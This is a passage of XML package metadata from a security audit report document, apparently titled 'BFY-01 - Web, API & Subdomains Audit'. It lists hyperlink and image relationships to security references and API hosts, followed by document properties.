Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/ecs/home?region=us-east-1&amp;/taskDefinitions" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csp-evaluator.withgoogle.com/" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cure53.de/xfo-clickjacking.pdf" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://moxie.org/software/sslstrip/" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tunetheweb.com/blog/dangerous-web-security-features/" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.varnish-software.com/tutorials/cache-invalidation/" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bridgefy.me/privacy-policy/" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.googleapis.com/" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firebaseinstallations.googleapis.com/" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firebaseremoteconfig.googleapis.com/" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.googleapis.com/" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securetoken.googleapis.com/" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.stripe.com/" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eprint.iacr.org/2016/1013" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/renovatebot/renovate" TargetMode="External"/><Relationship Id="rId288"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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://7asecurity.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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://7asecurity.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BFY-01 - Web, API &amp; Subdomains Audit_FINAL_r5_Shared</dc:title>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-17T01:15:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-17T01:15:47Z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2026-03-17T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="LastSaved">
    <vt:filetime>2026-03-17T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Producer">
    <vt:lpwstr>3-Heights(TM) PDF Security Shell 4.8.25.2 (http://www.pdf-tools.com)</vt:lpwstr>
  </property>
</Properties>
</file>